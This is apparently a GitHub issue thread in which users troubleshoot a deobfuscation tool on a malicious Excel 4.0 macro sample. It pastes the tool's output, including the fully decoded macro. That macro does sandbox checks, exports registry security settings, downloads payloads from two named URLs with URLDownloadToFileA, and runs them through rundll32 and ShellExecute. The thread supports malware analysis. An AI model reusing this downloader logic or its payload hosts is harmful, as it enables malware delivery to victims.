Closed Maijin closed 4 years ago
It seems the installed python package is not the latest version. Please update: pip install -U https://github.com/DissectMalware/XLMMacroDeobfuscator/archive/master.zip
https://app.any.run/tasks/db6c055f-9308-461b-b69b-af067e5c30b3/
I'm using the git version already
It seems the code is not updated, can you try once again. Use that -U switch please. On my side, I can see the macros (it is not fully deobfuscated though)
I did execute your command too just in case
Hm, I have the latest version https://www.capesandbox.com/analysis/4231/
CELL:GV39936 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!N44954,"350")
CELL:GV39937 , FullEvaluation ,GOTO(DZ42628)
CELL:DZ42628 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BP33912,"-324")
CELL:DZ42629 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IJ10688)
CELL:IJ10688 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AR12026,"354")
CELL:IJ10689 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FC53205)
CELL:FC53205 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EO10249,"-119.375")
CELL:FC53206 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EX42970)
CELL:EX42970 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HQ1545,"-1610.75")
CELL:EX42971 , FullEvaluation ,GOTO(BS22011)
CELL:BS22011 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BE35884,"-58.5")
CELL:BS22012 , FullEvaluation ,GOTO(GV15593)
CELL:GV15593 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EQ4206,"-117")
CELL:GV15594 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GU27740)
CELL:GU27740 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FR9280,"16")
CELL:GU27741 , FullEvaluation ,GOTO(EI18804)
CELL:EI18804 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EM607,"-352")
CELL:EI18805 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HP45619)
CELL:HP45619 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BX12067,"-660")
CELL:HP45620 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FZ15723)
CELL:FZ15723 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GC38174,"229")
CELL:FZ15724 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DG36945)
CELL:DG36945 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DH56289,"-880")
CELL:DG36946 , FullEvaluation ,GOTO(DE32138)
CELL:DE32138 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BC714,"-121")
CELL:DE32139 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AR8980)
CELL:AR8980 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HC64915,"-70")
CELL:AR8981 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BP50696)
CELL:BP50696 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DX52324,"-277")
CELL:BP50697 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BR26103)
CELL:BR26103 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DR4363,"-324")
CELL:BR26104 , FullEvaluation ,GOTO(BH29629)
CELL:BH29629 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GO46148,"498")
CELL:BH29630 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DS20724)
CELL:DS20724 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HV52886,"-138")
CELL:DS20725 , FullEvaluation ,GOTO(BJ25046)
CELL:BJ25046 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FC11381,"-409")
CELL:BJ25047 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HU5854)
CELL:HU5854 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IG51684,"-159")
CELL:HU5855 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IG63410)
CELL:IG63410 , FullEvaluation ,FORMULA.FILL("=""Te workb7YV cûnĖotCHAR(FR9280-GX55573)be0o8ened or rscaied Ċy MWrÄsoft EĒcel bÿcause t CHAR(BX12067+IH58864)ČruptÈ""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IJ30870)
CELL:IG63411 , FullEvaluation ,GOTO(GU23233)
CELL:GU23233 , FullEvaluation ,FORMULA.FILL("M""C:\ÿwnÄ?ssyětem32\rull32.¢e""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IG36768)
CELL:GU23234 , FullEvaluation ,GOTO(ER48982)
CELL:ER48982 , FullEvaluation ,FORMULA.FILL("=""httÆs:CHAR(BX12067+HX8892)Édoqs.microsofĜ.com/en-uCHAR(BX12067-IT32592)oiceĊdates/}ffi}e-mCHAR(BX12067-GQ6921)i-CHAR(BX12067-AX57549)oĖ-se}uriĜy-ďpdat-sL",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DS27743)
CELL:ER48983 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BW2025)
CELL:BW2025 , FullEvaluation ,FORMULA.FILL("1APPÈAXCHAR(BX12067+GT31749)MIOE()",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GQ9902)
CELL:BW2026 , FullEvaluation ,GOTO(FY9435)
CELL:FY9435 , FullEvaluation ,FORMULA.FILL("=pRGCHAR(BX12067-GX12638)T.WORKSPRCEÐ13)<E70,CLO}E(FAvIE4,)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FU28066)
CELL:FY9436 , FullEvaluation ,GOTO(S39706)
CELL:S39706 , FullEvaluation ,FORMULA.FILL("åI=(GETQWORKBPAeo(14S<39Z,CLOS=(FAôSE):)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EP16580)
CELL:S39707 , FullEvaluation ,GOTO(FP47804)
CELL:FP47804 , FullEvaluation ,FORMULA.FILL("=F(GEb.?{KSP4CECHAR(FR9280+BK1657)[97CHAR(BX12067+ER13725),QLOSE(TRUS))",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HE9813)
CELL:FP47805 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!G36679)
CELL:G36679 , FullEvaluation ,FORMULA.FILL("=IF(ïzT.yìKSPACE<42)CHAR(BX12067-J64035),CL÷E(TúUE))",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IJ45391)
CELL:G36680 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!C33283)
CELL:C33283 , FullEvaluation ,FORMULA.FILL("=I=(ISNUMcER(SEARCH(ÊWiĖdo
\3,GíT.eORKSP6
1)Ã),,CLOSE(~RýßCHAR(FR9280-II20509)!",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IF15617)
CELL:C33284 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!I52087)
CELL:I52087 , FullEvaluation ,FORMULA.FILL("=""EXCHAR(BX12067-FV8453)CHAR(BX12067+EX49285)úîCHAR(BX12067-C26854)CHAR(BX12067+DV54715)KmU\SoĎwaretçTcrosoft\Oftice\""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AR32666)
CELL:I52088 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BX45347)
CELL:BX45347 , FullEvaluation ,FORMULA.FILL("=""C:¢UerstPuVc\Q7vo.re/""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HB46563)
CELL:BX45348 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IE28733)
CELL:IE28733 , FullEvaluation ,FORMULA.FILL("=[-1CHAR(BX12067+HI10227)653]C[W140]&GE~CHAR(FR9280+IQ53023)WRKSPAE(ÌS&""$hxcel\Scu:i¯y 0ÎHI-\756]C[26]Î""º;yCHAR(FR9280-FJ51504)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GB51319)
CELL:IE28734 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!CO12689)
CELL:CO12689 , FullEvaluation ,FORMULA.FILL("=ÊC:\WidĉwËJsēstem3\reu.čxe",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FI4775)
CELL:CO12690 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AM23759)
CELL:AM23759 , Error ,FORMULA.FILL("CHAR(BX12067-FB62566)CALL(""ShYll32""&""ShQllEÔeċ=teA"",""JJCCCJJ""#H:""opYn,ì[C43793]v[90¤&úăÚ75']C[109k,0,54",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BW48568)
also just did sudo pip3 install git+https://github.com/DissectMalware/XLMMacroDeobfuscator.git -U
terminal
[Loading Cells]
auto_open: auto_open->MbN1jTM9PE9m097eYMH4qeGgJX3JZb!$GV$39936
[Starting Deobfuscation]
Error: No terminal defined for 'Ê' at line 1 col 2
=ÊC:\WidĉwËJsēstem3
\reu.čxe
^
Expecting: {'QUOTE', '__ANON_1', 'BOOLEAN', 'NAME', 'NUMBER', 'STRING', 'L_PRA'}
Previous tokens: Token(EQUAL, '=')
time elapsed: 3.527353048324585
the output is the same
On a Mac without Excel it doesn't work (that's what I pasted). On a Windows VM with Excel I have the same output as @doomedraven; maybe that's where the problem comes from?
I actually even deleted all the xlmdeobfuscator files on the Mac before reinstalling
Excel is not needed any more. You don't even need to install pywin32, which is required to work with the Excel COM obj. The app will check the presence of Excel if you don't specify the --no-ms-excel switch. But it will not fail to proceed if you don't have it or didn't install pywin32. Not sure why you have a problem with installing it on a Mac!
Can you do this:
pip show XLMMacroDeobfuscator
the current version is 0.1.3
This seems to work ok with xlrd2 and "-d 5" param. Many of the evaluations include DAY(NOW()).
@spencerwp how do you figure out the day param? bruteforce? with -d it works fine
╰─○ xlmdeobfuscator -2 -n -f Qi_7295.xls -d 5
Excel is not present
[Loading Cells]
auto_open: auto_open->MbN1jTM9PE9m097eYMH4qeGgJX3JZb!$GV$39936
[Starting Deobfuscation]
CELL:GV39936 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!N44954,"350")
CELL:GV39937 , FullEvaluation ,GOTO(DZ42628)
CELL:DZ42628 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BP33912,"-324")
CELL:DZ42629 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IJ10688)
CELL:IJ10688 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AR12026,"200")
CELL:IJ10689 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FC53205)
CELL:FC53205 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EO10249,"-119.375")
CELL:FC53206 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EX42970)
CELL:EX42970 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HQ1545,"-1610.75")
CELL:EX42971 , FullEvaluation ,GOTO(BS22011)
CELL:BS22011 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BE35884,"-72.5")
CELL:BS22012 , FullEvaluation ,GOTO(GV15593)
CELL:GV15593 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EQ4206,"-117")
CELL:GV15594 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GU27740)
CELL:GU27740 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FR9280,"72")
CELL:GU27741 , FullEvaluation ,GOTO(EI18804)
CELL:EI18804 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EM607,"-352")
CELL:EI18805 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HP45619)
CELL:HP45619 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BX12067,"-520")
CELL:HP45620 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FZ15723)
CELL:FZ15723 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GC38174,"229")
CELL:FZ15724 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DG36945)
CELL:DG36945 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DH56289,"-880")
CELL:DG36946 , FullEvaluation ,GOTO(DE32138)
CELL:DE32138 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BC714,"-121")
CELL:DE32139 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AR8980)
CELL:AR8980 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HC64915,"-70")
CELL:AR8981 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BP50696)
CELL:BP50696 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DX52324,"-277")
CELL:BP50697 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BR26103)
CELL:BR26103 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DR4363,"-366")
CELL:BR26104 , FullEvaluation ,GOTO(BH29629)
CELL:BH29629 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GO46148,"330")
CELL:BH29630 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DS20724)
CELL:DS20724 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HV52886,"-138")
CELL:DS20725 , FullEvaluation ,GOTO(BJ25046)
CELL:BJ25046 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FC11381,"-409")
CELL:BJ25047 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HU5854)
CELL:HU5854 , FullEvaluation ,SET.VALUE(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IG51684,"-159")
CELL:HU5855 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IG63410)
CELL:IG63410 , FullEvaluation ,FORMULA.FILL("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IJ30870)
CELL:IG63411 , FullEvaluation ,GOTO(GU23233)
CELL:GU23233 , FullEvaluation ,FORMULA.FILL("=""C:\Windows\system32\rundll32.exe""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IG36768)
CELL:GU23234 , FullEvaluation ,GOTO(ER48982)
CELL:ER48982 , FullEvaluation ,FORMULA.FILL("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DS27743)
CELL:ER48983 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BW2025)
CELL:BW2025 , FullEvaluation ,FORMULA.FILL("=APP.MAXIMIZE()",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GQ9902)
CELL:BW2026 , FullEvaluation ,GOTO(FY9435)
CELL:FY9435 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FU28066)
CELL:FY9436 , FullEvaluation ,GOTO(S39706)
CELL:S39706 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EP16580)
CELL:S39707 , FullEvaluation ,GOTO(FP47804)
CELL:FP47804 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HE9813)
CELL:FP47805 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!G36679)
CELL:G36679 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(42),,CLOSE(TRUE))",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IJ45391)
CELL:G36680 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!C33283)
CELL:C33283 , FullEvaluation ,FORMULA.FILL("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,CLOSE(TRUE))",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IF15617)
CELL:C33284 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!I52087)
CELL:I52087 , FullEvaluation ,FORMULA.FILL("=""EXPORT HKCU\Software\Microsoft\Office\""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AR32666)
CELL:I52088 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BX45347)
CELL:BX45347 , FullEvaluation ,FORMULA.FILL("=""C:\Users\Public\Qv7vo.reg""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HB46563)
CELL:BX45348 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IE28733)
CELL:IE28733 , FullEvaluation ,FORMULA.FILL("=R[-18653]C[-140]&GET.WORKSPACE(2)&""\Excel\Security ""&R[-4756]C[26]&"" /y""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GB51319)
CELL:IE28734 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!CO12689)
CELL:CO12689 , FullEvaluation ,FORMULA.FILL("=""C:\Windows\system32\reg.exe""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FI4775)
CELL:CO12690 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AM23759)
CELL:AM23759 , FullEvaluation ,FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-43793]C[90],R[2751]C[109],0,5)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BW48568)
CELL:AM23760 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HE63797)
CELL:HE63797 , FullEvaluation ,FORMULA.FILL("=WHILE(ISERROR(FILES(R[20579]C[139])))",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BS25984)
CELL:HE63798 , FullEvaluation ,GOTO(BF57512)
CELL:BF57512 , FullEvaluation ,FORMULA.FILL("=WAIT(NOW()+""00:00:01"")",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BS25985)
CELL:BF57513 , FullEvaluation ,GOTO(FM33746)
CELL:FM33746 , FullEvaluation ,FORMULA.FILL("=NEXT()",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BS25986)
CELL:FM33747 , FullEvaluation ,GOTO(A2901)
CELL:A2901 , FullEvaluation ,FORMULA.FILL("=""http://xn--80agatbmcgncccbd9andd6w.xn--p1ai/wp-smart.php""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!CN21650)
CELL:A2902 , FullEvaluation ,GOTO(GD3222)
CELL:GD3222 , FullEvaluation ,FORMULA.FILL("=""http://ekhobrand.com/wp-smart.php""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BH56678)
CELL:GD3223 , FullEvaluation ,GOTO(DY49440)
CELL:DY49440 , FullEvaluation ,FORMULA.FILL("=FOPEN(R[42258]C[95])",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DK4305)
CELL:DY49441 , FullEvaluation ,GOTO(GK10063)
CELL:GK10063 , FullEvaluation ,FORMULA.FILL("=FPOS(R[-12266]C[37],215)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BZ16571)
CELL:GK10064 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AV64812)
CELL:AV64812 , FullEvaluation ,FORMULA.FILL("=FREAD(R[-13463]C[-98],255)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HE17768)
CELL:AV64813 , FullEvaluation ,GOTO(GP9384)
CELL:GP9384 , FullEvaluation ,FORMULA.FILL("=FCLOSE(R[-12895]C[9])",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DB17200)
CELL:GP9385 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EB42504)
CELL:EB42504 , FullEvaluation ,FORMULA.FILL("=FILE.DELETE(R[-8553]C[151])",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BG55116)
CELL:EB42505 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FV8481)
CELL:FV8481 , FullEvaluation ,FORMULA.FILL("=IF(ISNUMBER(SEARCH(""0001"",R[-20517]C[85])),CLOSE(FALSE),)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DX38285)
CELL:FV8482 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DQ226)
CELL:DQ226 , FullEvaluation ,FORMULA.FILL("=""C:\Users\Public\DBoDYRP.html""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GQ29178)
CELL:DQ227 , FullEvaluation ,GOTO(FF49395)
CELL:FF49395 , FullEvaluation ,FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[20593]C[120],R[22028]C[196],0,0)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!C7150)
CELL:FF49396 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HB15991)
CELL:HB15991 , FullEvaluation ,FORMULA.FILL("=FILES(R[-9196]C[50])",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!ES38374)
CELL:HB15992 , FullEvaluation ,GOTO(CI7086)
CELL:CI7086 , FullEvaluation ,FORMULA.FILL("=IF(ISERROR(R[16199]C[83]),CLOSE(FALSE),)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BN22175)
CELL:CI7087 , FullEvaluation ,GOTO(DQ55298)
CELL:DQ55298 , FullEvaluation ,FORMULA.FILL("=""C:\Users\Public\3HylL.html""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EK37835)
CELL:DQ55299 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IA38483)
CELL:IA38483 , FullEvaluation ,FORMULA.FILL("=R[-27576]C[138]&"",DllRegisterServer""",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!C65411)
CELL:IA38484 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EP58082)
CELL:EP58082 , FullEvaluation ,FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-19267]C[-22],R[-3082]C[27],0,0)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DJ40917)
CELL:EP58083 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AR7983)
CELL:AR7983 , FullEvaluation ,FORMULA.FILL("=FILES(R[-18450]C[-62])",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GU56285)
CELL:AR7984 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IH27829)
CELL:IH27829 , FullEvaluation ,FORMULA.FILL("=IF(ISERROR(R[25823]C[151]),,RUN(R[-28301]C[128]))",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AZ30462)
CELL:IH27830 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!CC60603)
CELL:CC60603 , FullEvaluation ,FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[35570]C[-77],R[16727]C[4],0,0)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EG21108)
CELL:CC60604 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DX65350)
CELL:DX65350 , FullEvaluation ,FORMULA.FILL("=ALERT(R[28709]C[64],2)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FX2161)
CELL:DX65351 , FullEvaluation ,GOTO(BG11408)
CELL:BG11408 , FullEvaluation ,FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[13375]C[58],R[42018]C[-180],0,5)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GA23393)
CELL:BG11409 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GF33363)
CELL:GF33363 , FullEvaluation ,FORMULA.FILL("=CLOSE(FALSE)",MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BC22382)
CELL:GF33364 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IJ30870)
CELL:IJ30870 , FullEvaluation ,"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
CELL:IJ30871 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IG36768)
CELL:IG36768 , FullEvaluation ,"C:\Windows\system32\rundll32.exe"
CELL:IG36769 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!DS27743)
CELL:DS27743 , FullEvaluation ,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates"
CELL:DS27744 , FullEvaluation ,GOTO(GQ9902)
CELL:GQ9902 , NotImplemented ,APP.MAXIMIZE()
CELL:GQ9903 , FullEvaluation ,RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FU28066)
CELL:FU28066 , FullBranching ,IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
CELL:FU28066 , End ,[TRUE] CLOSE(FALSE)
CELL:FU28066 , FullEvaluation ,[FALSE]
CELL:FU28067 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EP16580)
CELL:EP16580 , FullBranching , IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)
CELL:EP16580 , End , [TRUE] CLOSE(FALSE)
CELL:EP16580 , FullEvaluation , [FALSE]
CELL:EP16581 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HE9813)
CELL:HE9813 , FullEvaluation , IF(GET.WORKSPACE(19),,CLOSE(TRUE))
CELL:HE9814 , FullEvaluation , GOTO(IJ45391)
CELL:IJ45391 , FullEvaluation , IF(GET.WORKSPACE(42),,CLOSE(TRUE))
CELL:IJ45392 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!IF15617)
CELL:IF15617 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
CELL:IF15618 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AR32666)
CELL:AR32666 , FullEvaluation , "EXPORT HKCU\Software\Microsoft\Office\"
CELL:AR32667 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!HB46563)
CELL:HB46563 , FullEvaluation , "C:\Users\Public\Qv7vo.reg"
CELL:HB46564 , FullEvaluation , GOTO(GB51319)
CELL:GB51319 , FullEvaluation , EXPORT HKCU\Software\Microsoft\Office\"GET.WORKSPACE(2)\Excel\Security "C:\Users\Public\Qv7vo.reg /y
CELL:GB51320 , FullEvaluation , GOTO(FI4775)
CELL:FI4775 , FullEvaluation , "C:\Windows\system32\reg.exe"
CELL:FI4776 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BW48568)
CELL:BW48568 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\reg.exe""","EXPORT HKCU\Software\Microsoft\Office\""GET.WORKSPACE(2)\Excel\Security ""C:\Users\Public\Qv7vo.reg /y",0,5)
CELL:BW48569 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BS25984)
CELL:BS25984 , PartialEvaluation , WHILE("""C:\Users\Public\Qv7vo.reg""")
CELL:BS25985 , PartialEvaluation , WAIT(NOW()+"00:00:01")
CELL:BS25986 , PartialEvaluation , NEXT()
CELL:BS25987 , FullEvaluation , GOTO(CN21650)
